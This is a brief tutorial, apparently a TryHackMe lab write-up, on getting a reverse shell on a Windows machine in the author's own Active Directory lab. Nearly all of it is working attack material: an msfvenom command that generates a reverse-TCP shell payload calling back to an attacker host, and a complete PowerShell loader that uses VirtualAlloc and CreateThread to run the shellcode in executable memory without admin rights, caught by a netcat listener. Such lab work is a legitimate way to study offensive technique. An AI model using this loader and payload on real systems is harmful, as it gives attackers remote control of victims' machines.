THM - Shellcode

This tutorial is about establishing a reverse shell on one of the Windows machine I set up in the AD environment in previous blog.

Make a reverse shell and set up a netcat listener on your attacker machine.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=[attacker machine] LPORT=[attacker port] -f powershell

Below script is what will be pasted on the powershell terminal in the target machine. This doesn't require Administrator privilege.

$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;

public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);  
}
"@

Add-Type $VrtAlloc 

$WaitFor= @"
using System;
using System.Runtime.InteropServices;

public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);   
}
"@

Add-Type $WaitFor

$CrtThread= @"
using System;
using System.Runtime.InteropServices;

public class CrtThread{
 [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  
}
"@
Add-Type $CrtThread   

[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

make a txt and paste the above script and replace the SHELLCODE_PLACEHOLDER with the actual shellcode that starts with 0xfc. And then, paste the first part of the script like below.

After that, copy and paste the remaining lines one by one like below. After that, go to your netcat listener and a connection is made to us and yay ! we have achieved a shell on the machine !